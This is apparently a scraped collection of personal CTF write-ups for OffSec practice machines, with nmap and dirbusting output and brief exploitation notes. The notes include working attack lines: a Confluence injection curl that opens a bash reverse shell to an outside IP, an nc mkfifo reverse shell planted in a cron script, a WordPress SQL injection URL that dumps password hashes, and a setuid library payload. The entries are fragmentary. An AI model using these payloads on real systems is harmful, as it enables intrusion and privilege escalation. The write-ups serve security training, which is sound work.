21l 172w 1100c http://192.168.143.109/vendor/league/oauth2-google/LICENSE 200 GET 28l 42w 921c http://192.168.143.109/vendor/league/oauth2-google/phpunit.xml.dist 200 GET 17l 27w 371c http://192.168.143.109/vendor/markbaker/matrix/infection.json.dist 200 GET 25l 172w 1109c http://192.168.143.109/vendor/markbaker/matrix/license.md 200 GET 83l 163w 3545c http://192.168.143.109/vendor/markbaker/matrix/composer.json 200 GET 1l 11w 69c http://192.168.143.109/vendor/markbaker/matrix/buildPhar.php 200 GET 5l 19w 226c http://192.168.143.109/vendor/markbaker/matrix/phpstan.neon 200 GET 34l 77w 868c http://192.168.143.109/vendor/paragonie/random_compat/composer.json 200 GET 5l 14w 134c http://192.168.143.109/vendor/paragonie/random_compat/build-phar.sh 200 GET 19l 167w 1060c http://192.168.143.109/vendor/symfony/deprecation-contracts/LICENSE 200 GET 5l 15w 159c http://192.168.143.109/vendor/symfony/deprecation-contracts/CHANGELOG.md 200 GET 4l 6w 132c http://192.168.143.109/vendor/doctrine/annotations/phpbench.json.dist 200 GET 35l 66w 843c http://192.168.143.109/vendor/symfony/deprecation-contracts/composer.json 200 GET 19l 167w 1065c http://192.168.143.109/vendor/doctrine/annotations/LICENSE 200 GET 26l 163w 1204c http://192.168.143.109/vendor/symfony/deprecation-contracts/README.md 200 GET 17l 32w 1035c http://192.168.143.109/vendor/doctrine/annotations/README.md 200 GET 20l 169w 1081c http://192.168.143.109/vendor/phpseclib/phpseclib/LICENSE 200 GET 13l 49w 818c http://192.168.143.109/vendor/doctrine/annotations/phpstan.neon 200 GET 6l 20w 279c http://192.168.143.109/vendor/phpseclib/phpseclib/AUTHORS 200 GET 8l 26w 339c http://192.168.143.109/vendor/phpseclib/phpseclib/BACKERS.md 200 GET 162l 927w 9158c http://192.168.143.109/vendor/doctrine/annotations/CHANGELOG.md 200 GET 28l 71w 873c http://192.168.143.109/vendor/symfony/polyfill-php72/README.md 200 GET 45l 103w 1520c http://192.168.143.109/vendor/doctrine/annotations/composer.json 200 GET 30l 160w 2332c http://192.168.143.109/vendor/phpoffice/phpspreadsheet/README.md 200 GET 123l 571w 6698c http://192.168.143.109/vendor/maennchen/zipstream-php/README.md 200 GET 75l 185w 2179c http://192.168.143.109/vendor/phpseclib/phpseclib/composer.json 200 GET 89l 227w 2856c http://192.168.143.109/vendor/phpoffice/phpspreadsheet/composer.json 200 GET 21l 169w 1079c http://192.168.143.109/vendor/phpoffice/phpspreadsheet/LICENSE 200 GET 11l 121w 842c http://192.168.143.109/vendor/phpoffice/phpspreadsheet/CONTRIBUTING.md 200 GET 35l 78w 949c http://192.168.143.109/vendor/symfony/polyfill-php72/composer.json 200 GET 55l 115w 1901c http://192.168.143.109/vendor/maennchen/zipstream-php/psalm.xml 200 GET 24l 189w 1265c http://192.168.143.109/vendor/maennchen/zipstream-php/LICENSE 200 GET 19l 167w 1065c http://192.168.143.109/vendor/symfony/polyfill-php72/LICENSE 200 GET 41l 97w 957c http://192.168.143.109/vendor/maennchen/zipstream-php/composer.json 200 GET 17l 21w 439c http://192.168.143.109/vendor/maennchen/zipstream-php/phpunit.xml.dist 200 GET 37l 84w 1046c http://192.168.143.109/vendor/symfony/polyfill-php70/composer.json 200 GET 51l 239w 1539c http://192.168.143.109/vendor/maennchen/zipstream-php/CHANGELOG.md 200 GET 34l 116w 1252c http://192.168.143.109/vendor/onelogin/php-saml/composer.json 200 GET 19l 167w 1065c http://192.168.143.109/vendor/symfony/polyfill-php70/LICENSE 200 GET 85l 259w 2488c http://192.168.143.109/vendor/robrichards/xmlseclibs/README.md 200 GET 23l 167w 1064c http://192.168.143.109/vendor/onelogin/php-saml/LICENSE 200 GET 18l 35w 737c http://192.168.143.109/vendor/onelogin/php-saml/phpunit.xml 200 GET 19l 61w 409c http://192.168.143.109/vendor/sabre/uri/ChangeLog.md 200 GET 228l 1107w 7617c http://192.168.143.109/vendor/robrichards/xmlseclibs/CHANGELOG.txt 200 GET 41l 78w 935c http://192.168.143.109/vendor/sabre/uri/composer.json 200 GET 33l 60w 755c http://192.168.143.109/vendor/symfony/finder/composer.json 200 GET 27l 222w 1569c http://192.168.143.109/vendor/sabre/uri/LICENSE 200 GET 31l 224w 1538c http://192.168.143.109/vendor/robrichards/xmlseclibs/LICENSE 200 GET 19l 167w 1065c http://192.168.143.109/vendor/symfony/finder/LICENSE 200 GET 79l 254w 1961c http://192.168.143.109/vendor/symfony/finder/CHANGELOG.md 200 GET 587l 3908w 37934c http://192.168.143.109/vendor/phpoffice/phpspreadsheet/CHANGELOG.md 200 GET 14l 33w 500c http://192.168.143.109/vendor/symfony/finder/README.md 200 GET 3l 10w 108c http://192.168.143.109/vendor/zircote/swagger-php/Changelog.md 200 GET 296l 2039w 15276c http://192.168.143.109/vendor/onelogin/php-saml/CHANGELOG 200 GET 126l 334w 3499c http://192.168.143.109/vendor/zircote/swagger-php/README.md 200 GET 72l 154w 1668c http://192.168.143.109/vendor/zircote/swagger-php/composer.json 200 GET 10l 13w 336c http://192.168.143.109/vendor/zircote/swagger-php/phpunit.xml.dist 200 GET 202l 1581w 11358c http://192.168.143.109/vendor/zircote/swagger-php/LICENSE-2.0.txt 200 GET 25l 59w 700c http://192.168.143.109/vendor/sabre/xml/README.md 200 GET 53l 133w 1406c http://192.168.143.109/vendor/sabre/xml/composer.json 200 GET 13l 29w 457c http://192.168.143.109/vendor/symfony/yaml/README.md 200 GET 27l 222w 1569c http://192.168.143.109/vendor/sabre/xml/LICENSE 200 GET 234l 991w 7102c http://192.168.143.109/vendor/sabre/xml/CHANGELOG.md 200 GET 19l 167w 1065c http://192.168.143.109/vendor/symfony/yaml/LICENSE 200 GET 1539l 8774w 63843c http://192.168.143.109/vendor/onelogin/php-saml/README.md 200 GET 47l 90w 1122c http://192.168.143.109/vendor/symfony/yaml/composer.json 404 GET 9l 31w 277c http://192.168.143.109/js2 404 GET 9l 31w 277c http://192.168.143.109/js2.php 404 GET 9l 31w 277c http://192.168.143.109/js2.html.txt 404 GET 9l 31w 277c http://192.168.143.109/css2 404 GET 9l 31w 277c http://192.168.143.109/css2.php 404 GET 9l 31w 277c http://192.168.143.109/css2.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jslib 404 GET 9l 31w 277c http://192.168.143.109/jslib.php 404 GET 9l 31w 277c http://192.168.143.109/jslib.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jsfiles 404 GET 9l 31w 277c http://192.168.143.109/jsky 404 GET 9l 31w 277c http://192.168.143.109/jsfiles.php 404 GET 9l 31w 277c http://192.168.143.109/jsky.php 404 GET 9l 31w 277c http://192.168.143.109/jsky.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jsfiles.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jss 404 GET 9l 31w 277c http://192.168.143.109/jss.php 404 GET 9l 31w 277c http://192.168.143.109/jss.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jscalendar 404 GET 9l 31w 277c http://192.168.143.109/jscalendar.php 404 GET 9l 31w 277c http://192.168.143.109/jscalendar.html.txt 200 GET 661l 5535w 35181c http://192.168.143.109/LICENSE 200 GET 58l 247w 2930c http://192.168.143.109/testldap.php 200 GET 31l 55w 906c http://192.168.143.109/testapi.php 200 GET 135l 652w 6983c http://192.168.143.109/testoauth2.php 200 GET 57l 227w 3001c http://192.168.143.109/testmail.php 200 GET 94l 267w 4776c http://192.168.143.109/testssl.php 200 GET 487l 1858w 32019c http://192.168.143.109/opcache.php 200 GET 87l 498w 190707c http://192.168.143.109/favicon.ico 200 GET 2l 27w 149998c http://192.168.143.109/assets/MDI-3.4.93/css/materialdesignicons.min.css 200 GET 210l 677w 13385c http://192.168.143.109/requirements.php 200 GET 7l 12w 127805c http://192.168.143.109/assets/MDI-3.4.93/css/materialdesignicons.css.map 200 GET 7l 12w 120577c http://192.168.143.109/assets/MDI-3.4.93/css/materialdesignicons.min.css.map 200 GET 14235l 17979w 199173c http://192.168.143.109/assets/MDI-3.4.93/css/materialdesignicons.css 404 GET 9l 31w 277c http://192.168.143.109/js-global Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nwe found this from dirbusting\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nPrivESC # Local enumeration exposed the misconfiguration, and the escalation path below was enough to move up.\nboom we rootin\n","date":"25 March 2026","externalUrl":null,"permalink":"/ctf-writeups/jordak/","section":"CTF Writeups","summary":"","title":"Jordak","type":"ctf-writeups"},{"content":" Plum # Overview # OS: Linux IP: 192.168.143.28 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE and simple exposed cred for privesc.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA) | 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA) |_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-title: PluXml - Blog or CMS, XML powered ! |_http-server-header: Apache/2.4.56 (Debian) Device type: general purpose Running: Linux 5.X Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nadmin:admin worked\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nhttps://github.com/MoritzHuppert/CVE-2022-25018/blob/main/CVE-2022-25018.pdf\n","date":"24 March 2026","externalUrl":null,"permalink":"/ctf-writeups/plum/","section":"CTF Writeups","summary":"","title":"Plum","type":"ctf-writeups"},{"content":" SPX # Overview # OS: Linux IP: 192.168.143.108 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE through SPX version and key leaked in phpinfo, privesc with sudo perms over make.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Tiny File Manager Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (97%) OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:6.0 Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # after replacing the key with the value from phpinfo we are able to access it\nlets check index.php where we get 2 hashes on which cracking gives us\nprofiler user\nlowprofile admin\nand now we are able to get in\nlets change index to our phpmonkey\nWE SWITCH into profiler user with the password lowprofile\n","date":"24 March 2026","externalUrl":null,"permalink":"/ctf-writeups/spx/","section":"CTF Writeups","summary":"","title":"SPX","type":"ctf-writeups"},{"content":" Flu # Overview # OS: Linux IP: 192.168.197.41 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Easy RCE then PrivESC with cronjob.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Nmap was my starting point here, and the service/version clues below shaped the next checks.\nPORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA) |_ 256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519) 8090/tcp open http Apache Tomcat (language: en) |_http-trane-info: Problem with XML parsing of /evox/about | http-title: Log In - Confluence |_Requested resource was /login.action?os_destination=%2Findex.action\u0026amp;permissionViolation=true 8091/tcp open jamlink? | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 204 No Content | Server: Aleph/0.4.6 | Date: Mon, 23 Mar 2026 12:13:01 GMT | Connection: Close | GetRequest: | HTTP/1.1 204 No Content | Server: Aleph/0.4.6 | Date: Mon, 23 Mar 2026 12:12:29 GMT | Connection: Close | HTTPOptions: | HTTP/1.1 200 OK | Access-Control-Allow-Origin: * | Access-Control-Max-Age: 31536000 | Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST | Server: Aleph/0.4.6 | Date: Mon, 23 Mar 2026 12:12:30 GMT | Connection: Close | content-length: 0 | Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 414 Request-URI Too Long | text is empty (possibly HTTP/0.9) | RTSPRequest: | HTTP/1.1 200 OK | Access-Control-Allow-Origin: * | Access-Control-Max-Age: 31536000 | Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST | Server: Aleph/0.4.6 | Date: Mon, 23 Mar 2026 12:12:30 GMT | Connection: Keep-Alive | content-length: 0 | SIPOptions: | HTTP/1.1 200 OK | Access-Control-Allow-Origin: * | Access-Control-Max-Age: 31536000 | Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST | Server: Aleph/0.4.6 | Date: Mon, 23 Mar 2026 12:13:07 GMT | Connection: Keep-Alive |_ content-length: 0 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerpri Dirbusting # Port 8090 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nLets send this\ncurl -v http://192.168.197.41:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.159/4444%200%3E%261%27%29.start%28%29%22%29%7D/ PrivESC # confluence ; HolingOn12\n/opt/atlassian/confluence/conf/server.xml\nnot gettting anywhere w this lets check the crontab\nwe know there is a cronjob running\nlets get psypy on and check it out\nwe notice this running with pspy every minute\nhmm so its running log-backup.sh\nand then doing the whole tar thing\nlets call it a day with this\necho \u0026#39;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2\u0026gt;\u0026amp;1|nc 192.168.45.240 3306 \u0026gt;/tmp/f\u0026#39; \u0026gt; log-backup.sh ","date":"23 March 2026","externalUrl":null,"permalink":"/ctf-writeups/flu/","section":"CTF Writeups","summary":"","title":"Flu","type":"ctf-writeups"},{"content":" PyLoader # Overview # OS: Linux IP: 192.168.143.26 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # direct root thru exploit.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 9666/tcp open http CherryPy wsgiserver | http-title: Login - pyLoad |_Requested resource was /login?next=http://192.168.143.26:9666/ | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Cheroot/8.6.0 Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirbusting # Port 9666 # I validated this step using the evidence below before moving forward in the chain.\nDefault creds\npyload:pyload\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\n0.5.0\nhttps://www.exploit-db.com/exploits/51532\nhttps://github.com/advisories/GHSA-3f7w-p8vr-4v5f\nand boom root so easy\n","date":"23 March 2026","externalUrl":null,"permalink":"/ctf-writeups/pyloader/","section":"CTF Writeups","summary":"","title":"PyLoader","type":"ctf-writeups"},{"content":" Workaholic # Overview # OS: Linux IP: 192.168.197.229 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # initial access with wordpress plugin sqli and then privesc with suid that needed compiling a library with a plugin.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65505 filtered tcp ports (no-response), 27 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA) |_ 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519) 80/tcp open http nginx 1.24.0 (Ubuntu) |_http-title: Workaholic **|_http-generator: WordPress 6.7.2** |_http-server-header: nginx/1.24.0 (Ubuntu) |_http-trane-info: Problem with XML parsing of /evox/about Aggressive OS guesses: Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (96%), Linux 4.15 - 5.19 (94%), Linux 2.6.32 - 3.13 (93%), OpenWrt 22.03 (Linux 5.10) (92%), Linux 3.10 - 4.11 (91%), Linux 5.0 (91%), Linux 3.2 - 4.14 (90%), Linux 2.6.32 - 3.10 (89%), MikroTik RouterOS 6.36 - 6.48 (Linux 3.3.5) (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel WPscan # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Apparently this site had a very old plugin acalled advanced search which is vulnerable to sqli\nlets retrieve hash of the users\nhttp://workaholic.offsec/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin\u0026amp;t=wp_users%20UNION%20SELECT%20user_pass%20FROM%20wp_users--\u0026amp;f=user_login\u0026amp;type=\u0026amp;e admin $P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn. okadamat17\ncharlie $P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p. chrish20\nted $P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/\nwe got in w the creds as ted:okadamat17\nwpadmin\nrU)tJnTw5*ShDt4nOx\nand boom we are able to use it to ssh in as charlie\nthis has suid set\nits looking for libsecurity.so and in it its looking for the init_plugin\nso lets create that w arev shell and have it run\ncat \u0026gt; /home/ted/.lib/libsecurity.c \u0026lt;\u0026lt; \u0026#39;EOF\u0026#39; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; void init_plugin() { setuid(0); setgid(0); system(\u0026#34;cp /bin/bash /tmp/bash \u0026amp;\u0026amp; chmod +s /tmp/bash \u0026amp;\u0026amp; /tmp/bash -p\u0026#34;); } EOF then lets compile with\ngcc -fPIC -shared -o /home/ted/.lib/libsecurity.so /home/ted/.lib/libsecurity.c ","date":"23 March 2026","externalUrl":null,"permalink":"/ctf-writeups/workaholic/","section":"CTF Writeups","summary":"","title":"Workaholic","type":"ctf-writeups"},{"content":" RubyDome # Overview # OS: Linux IP: 192.168.243.22 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE and then privesc with sudo -l.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # nmap 192.168.243.22 -sCV -Pn -p- -A --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-22 10:01 EDT Nmap scan report for 192.168.243.22 Host is up (0.079s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 3000/tcp open http WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07)) |_http-title: RubyDome HTML to PDF |_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07) Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1 78.49 ms 192.168.45.1 2 78.43 ms 192.168.45.254 3 78.69 ms 192.168.251.1 4 78.82 ms 192.168.243.22 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.70 seconds Dirbusting # Port 3000 # I validated this step using the evidence below before moving forward in the chain.\nExploitation # lets search up ruby 3.0.2\nwe found this exploit, on copying and running the payload after url encoding it w get our shell\n","date":"22 March 2026","externalUrl":null,"permalink":"/ctf-writeups/rubydome/","section":"CTF Writeups","summary":"","title":"RubyDome","type":"ctf-writeups"},{"content":" Press # Overview # OS: Linux IP: 192.168.126.29 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access with default creds and magic byte file upload bypass, privesc with gtfobins.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA) | 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA) |_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-title: Lugx Gaming Shop HTML5 Template |_http-server-header: Apache/2.4.56 (Debian) 8089/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-server-header: Apache/2.4.56 (Debian) |_http-generator: FlatPress fp-1.2.1 |_http-title: FlatPress Device type: general purpose Running: Linux 5.X Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\n8089 # I validated this step using the evidence below before moving forward in the chain.\nExploitation # i have a strong feeling this is the intended path so lets try bruteforcing the creds\nafter trying default creds admin:password we are in\nPrivESC # Local enumeration exposed the misconfiguration, and the escalation path below was enough to move up.\n","date":"21 March 2026","externalUrl":null,"permalink":"/ctf-writeups/press/","section":"CTF Writeups","summary":"","title":"Press","type":"ctf-writeups"},{"content":" Scrutiny # Overview # OS: Linux IP: 192.168.126.91 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE and then privesc with mail and exposed creds.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Nmap was my starting point here, and the service/version clues below shaped the next checks.\nlets add onlyrands.com to our hosts\nDirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nadd this to our hosts aswell\ngreat i think we can try getting in from here lets check\nExploitation # https://github.com/joshuavanderpoll/cve-2024-56348\naa\nlfound a 0xdf post telling us to enable debug first so lets do that\nexport TOKEN=\u0026#34;\u0026lt;TOKEN HERE\u0026gt;\u0026#34; checking around the website because that failed\nwe find this\nwe got mail\n","date":"21 March 2026","externalUrl":null,"permalink":"/ctf-writeups/scrutiny/","section":"CTF Writeups","summary":"","title":"Scrutiny","type":"ctf-writeups"},{"content":" Fired # Overview # OS: Linux IP: 192.168.217.96 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # BROKEN.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # ORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 51:56:a7:34:16:8e:3d:47:17:c8:96:d5:e6:94:46:46 (RSA) | 256 fe:76:e3:4c:2b:f6:f5:21:a2:4d:9f:59:52:39:b9:16 (ECDSA) |_ 256 2c:dd:62:7d:d6:1c:f4:fd:a1:e4:c8:aa:11:ae:d6:1f (ED25519) 9090/tcp open hadoop-datanode Apache Hadoop | hadoop-datanode-info: |_ Logs: jive-ibtn jive-btn-gradient |_http-title: Site doesn\u0026#39;t have a title (text/html). | hadoop-tasktracker-info: |_ Logs: jive-ibtn jive-btn-gradient 9091/tcp open ssl/hadoop-datanode Apache Hadoop |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=localhost | Subject Alternative Name: DNS:localhost, DNS:*.localhost | Not valid before: 2024-06-28T07:02:39 |_Not valid after: 2029-06-27T07:02:39 |_http-title: Site doesn\u0026#39;t have a title (text/html). | hadoop-tasktracker-info: |_ Logs: jive-ibtn jive-btn-gradient | hadoop-datanode-info: |_ Logs: jive-ibtn jive-btn-gradient Dirbusting # Port 80 # Exploitation # lets use this\nhttps://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT\nusing these creds we are in\nok so this lab is broken for me, im not able to get past the login page because it gets stuck\n","date":"20 March 2026","externalUrl":null,"permalink":"/ctf-writeups/fired/","section":"CTF Writeups","summary":"","title":"Fired","type":"ctf-writeups"},{"content":" LaVita # Overview # OS: Linux IP: 192.168.217.38 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for LaVita, including enumeration, exploitation, and privilege escalation.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0) | ssh-hostkey: | 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA) | 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA) |_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-title: W3.CSS Template |_http-server-header: Apache/2.4.56 (Debian) Device type: general purpose|router Dirbusting # Port 80 # Exploitation # i came across this\n","date":"20 March 2026","externalUrl":null,"permalink":"/ctf-writeups/lavita/","section":"CTF Writeups","summary":"","title":"LaVita","type":"ctf-writeups"},{"content":" pc # Overview # OS: Linux IP: 192.168.19.50 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # exploited rpc.py.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA) | 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA) |_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519) 8000/tcp open http ttyd 1.7.3-a2312cb (libwebsockets 3.2.0) |_http-title: ttyd - Terminal |_http-server-header: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0) Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirbusting # Port 80 # Exploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nwow lets just spawn a rev shell with nc and see where that take us\nok i can work better now\nPrivESC # nothing interesting but we found this in rpc.py\nser@pc:/opt$ cat rpc.py cat rpc.py from typing import AsyncGenerator from typing_extensions import TypedDict import uvicorn from rpcpy import RPC app = RPC(mode=\u0026#34;ASGI\u0026#34;) @app.register async def none() -\u0026gt; None: return @app.register async def sayhi(name: str) -\u0026gt; str: return 